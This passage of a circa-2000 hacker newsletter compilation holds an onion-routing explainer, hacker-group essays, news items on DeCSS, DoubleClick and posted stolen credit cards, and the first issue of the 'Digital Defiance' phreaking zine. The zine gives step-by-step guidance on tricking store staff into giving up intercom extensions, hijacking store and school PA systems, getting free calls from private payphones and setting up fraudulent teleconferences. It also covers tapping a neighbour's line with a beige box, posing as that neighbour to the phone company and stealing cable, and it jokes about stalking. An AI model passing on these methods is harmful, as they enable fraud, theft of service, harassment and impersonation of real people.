in. Someone between you and the website you're visiting is _not_ able to tell (easily) where you're going, or even where you're coming from. There are two notable systems in use/development today (at least what I've initially found). They are: Freedom - "Internet Identity Management System" http://www.zeroknowledge.com/products/ The Onion Router Project (US Naval Research Lab) http://www.onion-router.net/ There are some differences between the two, but I'm not going to analyze them. Now, how does this all work, you ask? The scheme is built upon public-key encryption (of varying strengths) and a 'private' network of routers. Basically, your packet doesn't take the direct route across the net like you'd expect it to. Instead, it is sent to a specialized computer which runs the 'onion routing software'. That 'onion router' (OR) hands the packet off to the next designated OR, which continues to forward it on, until the last OR designated finally delivers it to the true destination. I don't want to get into the mechanics for establishing routes and vendor-specific details like Freedom's Anonymous Mail Proxy, but instead I will explain the generic mechanism that allows you to send anonymous, private traffic across the internet via onion routing. A fairly good paper, by Goldschlag, Reed and Syverson, entitled, "Onion Routing for Anonymous and Private Internet Connections," does a thorough job of explaining this technology: http://www.onion-router.net/Publications/CACM-1999.pdf From the paper: Onion Routing operates by dynamically building anonymous connections within a network of real-time Chaum Mixes. A Mix is a store and forward device that accepts a number of fixed-length messages from numerous sources, performs cryptographic transformations on the messages, and then forwards the messages to the next destination in a random order. A single Mix makes tracking of a particular message either by specific bit-pattern, size, or ordering with respect to other messages difficult. By routing through numerous Mixes in the network, determining who is talking to whom becomes even more difficult. Onion Routing's network of core onion-routers (Mixes) is distributed, fault-tolerant, and under the control of multiple administrative domains, so no single onion- router can bring down the network or compromise a user's privacy, and cooperation between compromised onion-routers is thereby confounded. Freedom's system might be slightly different in implementation, but again, I'm ignoring details, and loving every minute of it! When a specific message needs to be sent through the onion-routed network, several layers of encryption are placed on the message, along with sufficient information to describe the path on a step-by-step basis. This way, each onion router along the way uses its own public key to decrypt the whole 'onion', at which point it recognizes the next onion router in the route, and forwards the partially-decrypted message to it. When the enveloped message eventually reaches the final onion router, it is decrypted to cleartext, and the message is passed to the destination, not too differently from if the source host had simply connected in the clear over the Internet, except for the fact that it was made virtually untraceable for the duration of its trip from end to end. Feel free to send me questions and commentary on anything I may have screwed up (or done well). kynik@gh0st.net *********************************************************************** *** The gh0st.net Project (Part 1 of 2): Phatal *********************************************************************** Gh0stnet in its simplest and most basic form is a security model. As a security model, gh0stnet's integrity is maintained by the fact that it protects access, whether this be access to data or some other resource makes no difference. Complication occurs when we examine gh0stnet's purpose. The theme is not necessarily to provide an ultra-secure network... it's simply to provide security. Whether the provision of security is done well or even in a rational manner is up to us as developers. Further complicating this matter is the concept of providing a security challenge or novelty to the public. Are we targeting a specific group of people to benefit from gh0stnet? As far as I'm concerned, no. While we are all obviously aware that gh0stnet's existence specifically caters to a certain type of computer user, there's been no real intention to do so. By virtue of not being funded by a corporation or the government and also by the virtue of being conceptualized by someone who spends the better part of his day immersed in computer security, the compsec underground will inevitably be an integral part of gh0stnet. Hopefully this will be one of its greatest assets. Although the physical establishment of gh0stnet is still in the works, I have a feeling that's going to be the easy part. I'm putting energy into gh0stnet with the intention that it will long surpass my interest. As a field of study and a science, computer security is an evolving subject. If gh0stnet is to ever provide anything substantial to its public, it will have to reflect this. Development: This is the area that gh0stnet should be the most active in. If there's one thing I hate it's purposeless work. What I hate more than purposeless work is being bored. From my perspective, I would prefer to do more than set up a number of boxes to let people hammer into the ground. It would be fun to look at the logs for a while, but ultimately it would become boring. I'm interested in using gh0stnet as a testbed for alternative, ingenuitive, and challenging security concepts. This would provide tons of fun for us, something interesting to give to the users besides boxen to break into, and more than likely create some very interesting offspring. Software or hardware, it's all a matter of what contributions we as individual developers have to offer. Participation: This is an area that I tend to give a lot of thought to. As "developers" we really do more than just develop. We maintain and administer gh0stnet. This is not a job. Participation is totally interest-based. I'm not one to force people into doing something that they don't want to. If it appears that the role you're taking in this project is not quite what you want or what you expect, it's important that you speak up. I sacrifice a lot of my free time for this but I don't neccessarily expect others to. The project does have a well-defined vision/goal that I may be relatively inflexible about, but not unapproachable. What I will be very wary of is the inclusion of other individuals outside of my sphere of influence. This is a delicate project from my standpoint, so I'm a little touchy as to who deals with it. To have one person on board who doesn't quite see the goal or has some other motives besides the prosperity of gh0stnet would have a negative impact on the project. Stating this here serves no other purpose than for you folks to be aware that I want a shiny, happy, rosey environment in which I deal with people who I know and trust. Not that I don't like contributions, but network management and planning should pretty much be kept between us developers. The most important part of getting this off the ground will be the communication that goes on between all of us. Hopefully most of the communication will be occurring on the gh0st.net box, courtesy of TF. Toxy has also been threatening to start a mailing list and that sounds kick ass to me. Natas, kp2, and I live in the same state and hopefully we'll all be getting drunk together soon ; ). <Next issue = Basic network structure && games> *********************************************************************** *** Violence, Censorship, & Our Rights : Blakboot *********************************************************************** [Editor's note: I've taken the liberty to publish this article by Fire Storm's founding member in his absence. This article was (and still is) available at <http://fire.gh0st.net/vcr.html>. It has not been edited from its original form, except for formatting to fit the page, and minor spelling corrections.] To most of the people whom will read this, I have no credibility - why should you listen to me? Well, because if you read any farther, I'm sure you will find that I'm not writing about anything extreme; these are our rights. Recently, in retaliation to school violence, people are working to suppress information pertaining to explosives; keep it out of the hands of youngsters. Although, this movement is not focusing on just that, rather make an exception to our rights, and quiet what we don't want people to hear. You see, this country is based on tolerance. Some may be prejudiced, but we as a whole, in this country, don't just go off destroy the minority. We tolerate it, because if one day our rights are threatened, we can count on other people to fight with us. It's about power of people, and not everyone can get what they want - so we must be tolerant, even if we don't totally agree with it. The movement is contradicting itself. People want to educate the masses into an objective whole, yet want to shut out information, and take the philosophy, "Ignorance is bliss". We should work towards happiness, because anyone can learn to KILL; bombs, guns, knives, etc. are beside the point. People kill because of many reasons, and "now they can" isn't it. The general public is quick to say that bombs, guns, and "outcasts" are the reason for this school violence problem. Wrong. Students don't kill just because they _can_, it's because, perhaps they're miserable? Perhaps they're implementing the violence many students just think about? My opinion is yes; I've even tempted to say majority by far think about violence as an outlet. "Wackos" just don't think about violence; everyone does and sometimes we actually do what we plan. I'm not trying to justify what these people do, but I'm saying this isn't just some isolated cases. Something is wrong. I personally think it's new presures in society today and the school enviroment. Keep in mind that the basic idea/concept of how school works has never changed. This "concept" isn't education, it's the enviroment, which is stressful and obviously causes violence. You may say something to the effect, "Stress is a natural part of life". I agree with you, but these are CHILDREN we're talking about, and they obviously can't cope. Back on the subject of unalienable rights. If we make an exception, we'll find ourselves taking away our own rights, _one_by_one_. There is NO exception, these are our RIGHTS! There will always be someone you disagree with, but you'd better respect THEIR freedom, if you want them to respect YOUR freedom. Because one day, your thoughts may not fit in with the majority. End points: People in the Untied States of America have the right of press; we can write about anything and everything. If you dont like it, leave. See how other goverments deal with these things, and tell me how much you hate liberalism. Leave and go to a country where you can't say jack, and tell me how much you'd like to shut up those boisterous protestants. This issue isn't something new. Censorship itself is an exception we've made, and it's wrong. *********************************************************************** *** Future Issues *********************************************************************** The gh0st.net Project (Part 2 of 2) : Phatal Creating Restricted ("Sandboxed") User Accounts : Fict *********************************************************************** *** Credits *********************************************************************** Editor: Kynik <kynik@gh0st.net> Co-editor: Ajax <ajax@gh0st.net> Article Contributions: Phatal <phatal@gh0st.net> Blakboot <blakboot@discussion.org> *********************************************************************** *** Subscription *********************************************************************** To subscribe to this 'zine: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of SUBSCRIBE To unsubscribe: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of UNSUBSCRIBE Submissions, questions, comments, and constructive chaos may also be directed to kynik@gh0st.net, napalmzine@hotmail.com or any of the contributors *********************************************************************** -=- And here's Digital Defiance Issue #1: :::::. ... ::::::. ::::: ::::: '::::: ::':::::. ''' ::: :::: :: ':::::. ::. ... ::::::: :::: :: .:::::: ::: ''' '':::'' :::: ::.:::::::'.::' .:::::. . ::: ::: .:::::. :::: ::::::::'.::: .::' ':::: ::: ::: ':::'':::. ::::. .: :::::::'.:::::. ':::...:::: .::: .:::. '::::::'::. .::::::::::: '::::'::' .::' .:::' .... .... .... ... .... . . .... .... .::' .::::' : : :.. :.. : :..: :' : : :.. '::.:::::' : : : : : : : : ': : : '''''' '''' '''' ' ''' ' ' ' ' '''' '''' Art By Pyro Disclaimer: All the below mentioned information is published for educational purpurposes only I myself nor any staff member of Digital Defiance promote criminal activities, please don't use this info to tarnish the reputation of "hackers" or "phreakers" worldwide. Table of Contents: 1. Introduction -Xenos 2. Feature of the Month:DialPad.com -Pyro 3. Intercom Fun -Xenos 4. COCOTS and other privately owned payphones -Pyro 5. Various Call Tracing Devices and Services -Toxis 6. Closing and Various Thoughts and Comments -Digital Defiance Staff Protection is an Illusion - Xenos 1. Introduction Here it is the first issue of Digital Defiance. Let me provide some background info, On June 13th of 1999 after the PLA 919 site had been taken down due to the fact that Code Zero it's former founder had moved I decided to put PLA 919 back on the net. July 1st of 1999 Pyro joined up with PLA 919, it was the start of a good friendship. germ a friend of mine had joined but was not prodominantly in the scene and so she left, Spy109 started PLA 252 and so he left. On July 5th of 1999 I put out the first issue of PLA 919 along with an article or two from Pyro and two from germ. After months of diliberation I decided I would freeze PLA 919 as a "zine" and keep it up as a page for NC phreaks to meet. I didn't like the negative connotations that arose with the acronym PLA and I felt that after some time I would do better also with an independent organization. Me and Pyro decided on Digital Defiance. As of now the staff members of Digital Defiance are myself(Xenos), Pyro and a boy by the name of Toxis. Digital Defiance is situated at digital-defiance.hypermart.net but if you have this article you probally know that. After the available funds are aquired I will be registering www.digital-defiance.org. As for now hypermart is great. I hope that the readers of Digital Defiance are satisfied and will continue to be. Now the cheezy part, SHOUTS: Pyro, Toxis, Geo, Tory, Kimmie, Ivy, Twinjames, Oktium, oreo, Claudia(better luck next time), Gibson, Nikita, nite, Courtney, Yerba, heX, Subconcious, Myth, peak, Beaty, lots of other people that are going to beat me up after they see they aren't on here. Now on with the show. 2. Feature of the Month: DialPad Well, I first came upon this one when I was looking for a way to get my computer to record my prank calls directly, instead of to a tape recorder and then to my computer. One of my friends suggested a service called DialPad so I checked it out. I was never able to DialPad to work that way because the computer only records my side of the conversation well but the other side is left sounding faint and distant but the service is still kick-ass. So, what is DialPad? DialPad is a free online service that allows you to make uncharged calls to about anywhere. It does not allow 900 numbers from what I can tell, so you phone sex freaks will have to take it elsewhere. Basically what happens is when you log into your account is this nifty Java applet pops up which allows you to make phonecalls. You punch in the numbers and then press dial and there you have it. You can even call someone else who is on the service if they are using dial pad at the same time but it sounds real messed up. Some other problems I have encountered is that your voice seems kinda lowered and distorted to people on the phone that you call with DialPad but they can still make out what you are saying. In many ways that is almost a plus as it makes for hilarious pranking. My personal favorite is calling 1-800-COLLECT and getting operator assistance. It's real fun to just trying to get into conversations with the operators. Now, you would probably hold back from pranking because you don't feel like getting in trouble, right? Well, actually, the ANI always seems to return an "Unknown Number" and I have tested this on many different ANI's and VMB's and even the freaking operators seem to be stumped. For example, a couple times, I have called up an operator and in the background, in the bakaround I heard a lot of funny stuff. Some of them were saying "God damn it, who is this guy!?" and "Man, where are those little fuckers calling from?!". I laughed my ass of while they bitched to their coworkers and then hung up on me. One time, I called an operator and I mentioned that I had been pranking them a lot that night (jist to piss her off) and she said "Well, yes. We have been getting a lot of reports of that kinda thing." So, I asked what my number that I was calling from was and well I could practically hear her head almost explode as she said that it "was none of my business!" This made me laugh because it was my business. I mean, I was calling from that number. It goes to show you that they really cannot trace you. So, stop by DialPad.com and have fun. One thing I suggest is that you give 'em fake info so if they do get that far, they wont get any further. Have fun and be careful! 3. Intercom Fun So hmmm its rainy today and you are really bored? I have the remedy, your not paying the money for long distance calls to friends, your tired of TV, being a conf. whore just isn't settling with your stomach so, you give stuff away free at K-Mart. Wait you say, I don't want to go to K-Mart and those of you underage are saying you can't drive, so why not take the PA. The Planning: There isn't much planning on my case cause I come up with fake names like that and fake titles and posistions in companys like that so just go grab your phone book(if you don't have on and say your a phreak go get one now before I beat you up)and look for the addresses of two different K-Marts(you can substitute Target, Wal-Mart, etc..) Dial the target K-Mart and repeat something similar to the following, "Hi this is Jake Watson over at the Hamilton store, are you guys having some problems with your PA system(some people say intercom)" be sure to have gotten the manager first most of the time the other employees are just plain dumb. He will tell you know of course at which point you will say "Well we have been and I don't know what is going on, usually we use #50 and I remember the old manager said you guys had the same type system as us. I was just wondering" Let him get some words in it makes him feel special he will probally just tell you that its working fine for him he doesn't know what's wrong. You might even want to make up a sympton first like its giving you static when you press #50 or something like that. Then say "Well what is the extension you guys over their use?". Hey will tell you after all you are over at the Hamilaton street store why would he suspect you are just some no good punk trying to give away his store? Say well thanks anyway and say you will try that and have a good day and all that. The Strike: Later on call the store back, you will probally get the help desk or something, I recommend getting transfered to gardening or toys or something cause the help desk will probally say no when you asked to be transfered to extension #8090 and they recongize its the PA extension. Some places like Target I have heard will just transfer you back to the help desk if you ask to be transfered. Sometimes you get places that are like just hit #something when I put you on hold. Then hit the intercom extension. You can stuff all sorts of stuff. At a BeyondHope convention they told everyone in the store that everything on Isle 4 was free, maybe say you are the manager and spout racist statements. In the end no one really gets hurt and you are happy. I once thought of getting a friend to be in electronics and then say everything there was free. I knew that if everyone grabbed stuff the alarms would go off like mad and your friend could slip by un-noticed. I don't recommend theivery though. Ok so I have told you what to do with K-Mart. What about school fun. This was actually an idea I had early on when I first went to school and it was actually done as a senior prank by some other guys. Most schools if not all schools have an intercom system to page teachers and students when they need them to suspend them or bitch at them for showing bad movies or something of that nature for either students or teachers. Fortunate for the average student most school employees are really stupid when it comes to the technological aspect of their work. For instance, my school allows use of all extensions from any phone hooked up to the school's phone line. So say you were a senior and you drilled a hole in the side of the trailor and ran it out to the parking lot and played some vulgar tape after pressing #00 you would have it played throughout the school just because you have an extension. You might try a manual hand scan of the phone numbers that your school owns, just a tip on that. Get any number of your school and the first five digits are the ones it owns like 856-79XX or something like that. Sometimes you might find that your school runs a PBX and that you can abuse them further. Getting the extension numbers isn't hard they are probally posted behind the desk in the office just because the secretarys are too dumb to remember them. So just try to find a number for the school that will give you and outside line or beige off the side or something like that. A lot of diff. places use paging systems that are often times tied into the PBX system or have the phone systems integrated into them. Try using the line "Can I get an outside line" a lot and mention you are from so and so department or you are testing such and such. Sorry for the brief cut off of information I had started this in the mood to write a really large article but I had stopped half-way through and had to come back to the zine and keep writing so its not as good as I planned it to be. 4. COCOTS and other privately owned payphones === Introduction === Many of you have probably heard of COCOTs at one time or another. Maybe somebody mentioned it briefly but you didn't know what one was. Well, simply put, COCOTs are privately owned payphones not controlled by Ma Bell. COCOT stands for Customer Owned Coin Operated Telephone. Sounds neat, eh. But where are these "COCOTs?" They are everywhere! They are at convenience stores, malls, schools, clubs, and tons of other places like that. A convenience store down the street from me happens to have three but how do I know that these phones are COCOTs? Well, some of a COCOT's distinguishing features include: -The COCOTs never have their phone number listed on them (they don't like you to have it) -They will not have the AT&T logo or whatever on them. This is mainly because they use expensive rip-off carriers so they can cash in. -They have some nifty stuff inside em (not visible but very detectable as I will explain later) -They are run on standard telephone loop lines instead of the "special" payphone loops There are some other unique things about them but those seem to stand out in my mind the most. Plus, those are the best ways to identify them. The not having the local phone company logo on them is probably enough to pick one out by it self alone already but I have been tricked by this one GTE phone at my High School. The GTE logo was hidden but I did see that it's phone number was listed so you can see that they are pretty easy to pick out of a lineup by checking for the features I listed above. In this article, I will try to keep the information as factual as possible but I may get into theory a little bit with the things IM not sure of. === The different types of COCOTs === I've done some major research on COCOTs and I have gotten the most common ones you'll find and I will describe them here. -The Elcotel series 5 Elcotell phones are pretty simple. They run on line power and will not do anything if disconnected. They are pretty common and you could probably pick one out right after you had dialed a number because faintly in the background you can hear the number being redialed (and pretty slowly too). These phones take the money after your call is over and they will ask for more if it is required in a fairly human like voice. It is pretty fun to call them and mess around because when you call and their modem shuts up you can dial number and it thinks that it is placing that call. If you call it and do nothing it will read out it's number and how much money it has acquired. I have heard of another type Elcotel phone being used but I have never seen one. -The Ernest Telecom D1 Once again this phone is not the only made by the company but it is the most common. This COCOT is unique in that it uses a fake dial tone which is hard to distinguish from a real one but it's there. These guys work on a supplied power line and wont work if the power is out. These particular phones have a nasty sounding robotic voice that gets kind of distorted sometimes and when you call them a modem answers. Another model I have seen of theirs is the D3 which uses a real dial tone but I wont get into to much depth with this one... -The Protel models There are a couple different protel phones in use today. Those are the Protel 2000, 4000, 7000, and 8000, models. From what I hear the 8000 and 4000 are fairly similar. I have personally never run into these but I hear that they are more widely used along the western half of the US. I don't know too much about them so I will just mention their existence. -The Intellicall phones The first of two models commonly used is the ultratel. These things are pretty old but you can still find em in rural areas. they aren't to much to look at and they have an annoying computerized voice. These phones are pretty fickle about dialing procedures and they will get on your nerves pretty quickly. When you place a call and the receiving party answers the phone will play the 1 tone a couple times to prevent fraud but I have not heard of anyone doing anything to mess with those anyway. The other model made by intellicall is the astrotel. it is newer and has a less annoying voice that sounds more like an actual human. Now these phones happen to have a 14,400 baud modem which is not bad for an ugly payphone. These phones also do the 1 tone thing when the phone is answered so if you plan on scamming these your out of luck. Well, there are probably a bunch more COCOT type phones out there but I mainly know of these. If you know of any others of significance, send some info on them in and I may alter this article to include that phone. === So what's so cool about these phones? === As you have read there are varied types of COCOTs and each is slightly different. And with each phone there are certain flaws. On some phones (I have not got the documentation of which) you can get real easy free calls, providing that the phone does not mute the microphone in the handset after you are hung up on. Getting any ideas? Well, on those nifty little phones you can call up some random 800 number and when the number answers you, just keep quiet. They will get tired of listening to nothing and will then hang up on you. Now, instead of setting the phone back down you would wait and then hear a second dial tone. Now, you would be able to punch in your real number and call up your friend. Well, not exactly. When the person on the other line hangs up on you, the phone deactivates the keypad so you have to hang up to use it again. I have actually heard that in some instances the buttons will be locked in place. I thought that was weird but it is still somthing you can bypass and in the same way too. You would whip out your trusty Radio Hack tone dialer and dial away. Yep, free calls. I have done it a few times but at the time I could not pick out different types of COCOT models, so I don't remember which models allow that kind of thing. It can be done, all I need to do is keep searching. Now, I have only heard other people's stories but they suggest to me that are easy to red box. Since it is a regular line and the phone deals with everything by it self, the phone company cannot catch you. I have not boxed a COCOT myself or even seen it done first hand but I will probably try to box a COCOT someday. Another nifty thing you can do with many COCOTs involves the modems that they have inside. When a customer purchases a COCOT, they receive a couple things along with it. They will get a manual of course but in addition to that they will get a cool software package. With this, the owner can dial into the COCOT and communicate with the modem. That way, they can remotely find out how much money it has and maybe some other stuff depending on the model. If someone could get their hands on that software, they would have some fun with it, IM sure. === Alliance Teleconferencing === Another cool thing to do with COCOTs is to set up an alliance teleconference. It is fairly simpler than the name suggest with it's 5 dollar words and all. To set one up on a COCOT, you would probably want some ulterior, nontraceable way of getting in touch with you (yep, this requires social engineering). One method that comes to mind is setting up a Ureach account. All you do is go to www.Ureach.com and you can get a 100% free VMB. Now getting back to setting up that conference. So after you pick a target phone, you call the AT&T teleconference setup number at 1-800-232-1234 (there are others but this one is the single best I know of). They will ask you for info and you just give them what you want them to know. After they ask all that stuff they might want to know and they ask for the number they can reach you at, tell them that you are calling from your business phone (yes, it is suggested that you say it is for a business conference) but you will be out for the next few days (or around how long it may take to set up the conference) and that they may reach you at your VMB (yep, the one you set up and also try to make the VMB greeting sound legit as it will add to credibility). Now you wait and they will call your VMB in a while with all the info you need. Once this is done you have a conference waiting to happen. Note: It is not suggested that you use the admin. code to access the conference so that they cannot prove that you were the one to have set it up in the first place. So when you get in there and they ask you how you got into the "fraudulent" conference you simply say that some guy online said to. === Closing === Well, I hope this was informative for you. I actually learned some stuff too while I was gathering info. I would like to thank toxis for inadvertently giving me the idea to write this article and I would also like to thank El Jefe for having an informative payphone website at which i gathered info on specific COCOT models and Xenos for the info on dialing into the COCOT modems. 5. Various Call Tracing Devices and Services Caller ID - CNA - ANI - ANAC -- How does the telco trace all those prank calls you've been making to that op who really turns you on? Well, if you're smart, they won't be able to use CallerID to get your number, but it is a possibility, so let's examine that first. The technical workings of CallerID are very easily found. A good text on it is available at http://www.flinthills.com/~hevnsnt/newbie/callerid.txt and tells you everything you'd never need to know is there. And it really would not make sense to write it all here, but here are the basics. When you make a call, it has a header (not unlike an ICMP header) which tells the CallerID box which every yuppie owns that you are calling from 1800-P00P-SEX and your name is Tom. This way, they can call you back, or bitch you out. But what if you're blocking CallerID info? How does that sexy op at Bell know your phone number? Well, either you gave it to her, or they used a service called ANI. ANI stands for Automatic Number Identifier. You can use ANI too. What ANI does, is it reads back your number. That simple. Don't worry about HOW it works, but know it does. ANI numbers are useful for you naughty beige boxers because it tells you the number you are calling from. This way, you can set up a conf for everyone in #2600. A close relative of ANI is ANAC. ANAC is really just ANI but local to an area code, and sometimes open to the public. ANAC stands for Automatic Number Announcement Circuit. In most areas, ANAC numbers are like Directory Assistance and have a 3 digit code. In some places, it is 711 or 200. Dialing it will read back your number. Same uses as above. And one thing useful for messing with people along with these is CNA. CNA is Customer's Name and Address. Any guesses as to what it does? It tells you the name of address of a specified phone number. I have successfully used 411 to do this, without a true CNA service, or something like infospace.com which I recommend highly. If you're (God forbid) stalking someone, and you are calling them constantly, and want to know where they live, you could get their CNA and then go to teir house and show them your willy. Note: CNAs are almost never open to the public, so you can try to get the bitch at 411 to do it for you, or you could use one, albeit illegal. Something many people overlook is the ability to mess with someone through a combination of these, or get free 3-way-calling. What you do is, first, go to phreakers university in Canonsburg PA, remember, the Phone Fraud Fox says we are 'taught'. Take Social Engineering 1, 2, and 3. Now go to your neighbor's telco box, and hook up your beige box. Now call an ANI or ANAC and now you got their number. Next, get the CNA for that number. Now, call up the telco, its GTE here, soon to be Bell Atlantic ;-), and get them to add three way calling or ask them if its been installed yet, saying the service was giving you trouble. Act like the person whose name you got in the CNA record, and you're set. Now just run some line (you can get this by going with a friend, distracting the lineman, and having one of you grab a spool and toss it into a bookbag) to your house, and hook it into the rack of modular jacks, patch cable, and switches, and the light which tells if the line is in use. Now, whenever you want to three way call, clip after where you connected your line (could install a device which open/closes the circuit) so they cant pick up, and three way call your 31337 friends. 6. Closing and Various Thoughts and Comments I wanted to appologize for the fact that Toxis' article isn't like the rest of the zine, its just the difference between him using his text editor and me and Pyro ours and I don't feel much like fixing it out being as I have a lot of stuff to do aside from this. - Xenos I am sorry for the slow upgrading I suppose of the Digital Defiance site like I said I have lots to do aside from this. I have had some conflicts with other online related events that turned out to be fine but for a night I didn't get online. I think that once the vacations come etc... I will have time to pay more attention to the zine and the site and I will have my laptop then so I can work on the articles everywhere. - Xenos We do accept article submissions for review and possible publishing them in Digital Defiance later issues. This first issue only has a couple of articles because we wanted to start small and build up. Feel free to send questions, comments, mail you want in the issues to DigitalDefiance@juno.com - Xenos Hey, this is Pyro. I would like to thank the other members of Tele-Hell and Digital Defiance for their continuing support in my efforts. I hope you all really like our first issue. This has got to be one of the best things I have ever taken part in and IM glad I had the opportunity to meet Xenos and be able to construct out very own zine, he truly is 13370. Well, that's about it for now. Oh, and if you want personalized graphics (smell a shameless plug?) drop me a line. Thanks again... -Pyro (C) Copyright, Xenos 1999 Unless special permission is obtained from Xenos none of the pre-ceeding information can be used without the name of the original writer on it. @HWA 86.0 HHN: Feb 2nd: WorldWide Protest Against MPAA Planned ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of web sites. Press Release http://www.hackernews.com/press/2600DVD.html Open DVD http://www.opendvd.org 2600 http://www.2600.com February 2, 2000 FOR IMMEDIATE RELEASE DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of websites. Lawsuits have been filed against hundreds of people, as well as an Internet Service Provider and a magazine, for having information the MPAA wants to keep secret. The controversy centers around a computer program known as DeCSS, thought to be written by a 16 year old in Norway. The program defeats the encryption scheme used by DVD's which prohibits them from being viewed on non-approved machines or computers. It also enables DVD's from one country to be played in another, contrary to the wishes of the movie industry. It does NOT facilitate DVD piracy - in fact, copying DVD's has been possible since their introduction years ago. In its press releases on the subject, the MPAA has claimed that this is a piracy issue and they have subsequently succeeded in getting injunctions against a number of sites that had posted the program in the interests of free speech. This is in effect a lawsuit against the entire Internet community by extremely powerful corporate interests. The lawsuit and the various actions being planned promise to be a real showdown between two increasingly disparate sides in the technological age. The consequences of losing this case are so serious that civil libertarians, professors, lawyers, and a wide variety of others have already stepped forward to help out. Friday's action will be coordinated in 74 cities throughout North America and 26 cities in other parts of the world. Leafletting will take place outside theaters and video stores in these cities - all of which participate in a monthly "2600" gathering. 2600 Magazine has been named in two lawsuits regarding the DeCSS program and has joined with the the growing number of people who will fight these actions by the MPAA until the end. The lawsuit has been filed by the Motion Picture Association of America, Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and Time Warner Entertainment. Contact: Emmanuel Goldstein (631) 751-2600 ext. 0 @HWA 87.0 HNN: Feb 2nd; DoubleClick Receiving Protests ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Recent plans by online advertiser DoubleClick to match web surfers with offline profiles for more targeted ad campaigns has caused concern among consumer advocacy groups. The Center for Democracy and Technology (CDT) is calling for the public to send email to DoubleClick's CEO and 60 of the company's clients. The Center for Democracy and Technology http://www.cdt.org/ C|Net http://news.cnet.com/news/0-1005-200-1539478.html?tag=st.ne.1002.bgif.1005-200-1539478 DoubleClick under email attack for consumer profiling plans By Evan Hansen Staff Writer, CNET News.com February 2, 2000, 5:35 p.m. PT update A consumer advocacy group has organized a protest against DoubleClick, encouraging the public to email complaints about the online marketing giant's privacy policies to the company and 60 of its clients. The Center for Democracy and Technology (CDT) unveiled the campaign yesterday, calling for a stop to what it describes as DoubleClick's efforts to use its relationships with prominent Internet companies to track the online activities of millions of individuals and tie them to those individuals' offline activities. DoubleClick denied that it collects information on personally identifiable individuals in an email response to the campaign sent to it clients yesterday. "DoubleClick does not use highly sensitive information for profiling such as health information, detailed financial information, information of a sexual nature and information on children," the email reads. "DoubleClick will not link personally identifiable information about a user to online behavior without first giving that user notice and the choice not to participate. "DoubleClick does not and cannot know the identity of a user online unless that user has provided that information to an Abacus Online participant who has provided the user with the appropriate notice and choice." Gregg Bishop, the vice president for technology operations at DoubleClick client TheStreet.com, said his company began receiving emails from the protest list at about noon yesterday. He said he had received 2,200 emails from the campaign by early this morning. "The first thing we did was turn around and contact DoubleClick," he said. "We were told that what the CDT is doing is legal." Bishop said TheStreet.com does not share information about its customers with DoubleClick. He said the company will post a policy regarding its relationship with DoubleClick on its Web site and refer people who complain through the CDT's email distribution list to that statement. "I've only noticed one complaint that has come from our more than 100,000 actual customers," he said. The protest comes after DoubleClick last week quietly published a new privacy policy that discloses plans to create a database of consumer profiles that would include each user's name and address; retail, catalog and online purchase history; and demographic data. The database, which DoubleClick says will only be seen by the company itself, is intended to help the targeted marketing efforts of its nascent U.S.-based Abacus Alliance--an outgrowth of its recent acquisition of direct marketer Abacus Direct. Until recently, DoubleClick's policy was to refrain from correlating personal information with its 100 million cookies, which are scattered worldwide. But the new database will rely on the cookies, which the company places on Net users' computers to record surfing habits and display pertinent advertising. Net users aren't informed when they are given a DoubleClick cookie unless their browser is preset to do so, but they can "opt out" through the company's Web site. The CDT Web site gives consumers instructions on how to remove the cookies from their computers and opt out of the system. It also includes a form letter that visitors can elect to send to the public email addresses of DoubleClick's CEO and 60 of the company's clients. CDT spokesman Ari Schwartz said the DoubleClick clients targeted in the campaign were culled from DoubleClick's Web site and SEC filings. The email is being distributed through a mailing list dubbed "doubleclickwatch." Targeted companies have the choice of opting out of the list by replying to the email, although companies that opt out may continue to receive individually addressed emails. "To whom it may concern," the message begins. "I understand that you are a member of the DoubleClick network. This means that you allow DoubleClick to collect information about what I do at your Web site. I believe that this practice is objectionable and should not occur without my explicit permission." Among the companies included on the email distribution list are AltaVista, Ask Jeeves, AuctionWatch, Blue Mountain Arts, Drkoop.com, Hewlett-Packard, Kozmo.com, Network Solutions and The New York Times Co. Schwartz said that at least 500 emails went out from the site in the first five hours of the protest, which began at 10 a.m. PST. In that time, two recipients asked to be removed from the list, he said, although Schwartz declined to identify them. Schwartz said the CDT did not know which sites might be involved in providing personal information to DoubleClick to link online and offline data about their customers' behavior. But he said the group wants to harness the public to put pressure on all of DoubleClick's estimated 11,500 clients to protect customers' privacy. "We want these companies to be aware that their customers are concerned about this issue," he said. @HWA 88.0 HNN: Feb 2nd: More CC Numbers Found on Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Someone calling himself "Curador" posted over a thousand credit card numbers to a Xoom.com home page yesterday and claimed to have 4000 more. Xoom.com removed the page but it reappeared on Geocities a few hours later. The source of the numbers has not been revealed. Internet News http://www.internetnews.com/ec-news/article/0,1087,4_298021,00.html Another Cracker Posts Stolen Cards Online February 1, 2000 By Brian McWilliams InternetNews.com Correspondent E-Commerce News Archives Another e-commerce site has been turned inside out by a cracker. Someone calling himself "Curador" claims to have stolen the entire sales database of an unidentified online site, including more than 5,000 credit card numbers. Around 1,000 of the stolen card numbers were posted by Curador late Monday night at a personal Website hosted by Xoom.com, the online homesteading site owned by NBC interactive (NBCI) . After being notified about the Curador site, Xoom took it offline late Tuesday morning. The site, minus the credit card data, is mirrored here. Later Tuesday, Curador resurfaced at Geocities, where he posted what he claimed was the credit card number of Microsoft chairman Bill Gates. While the incident echoes the break-in and extortion attempt at CDuniverse.com earlier this month, Curador implied his motives were purely educational. "Maybe one day people will setup their sites properly before they start trading because otherwise this won't be the last page I post to the NET," wrote the cracker in a message at his site. No common shopping patterns were immediately 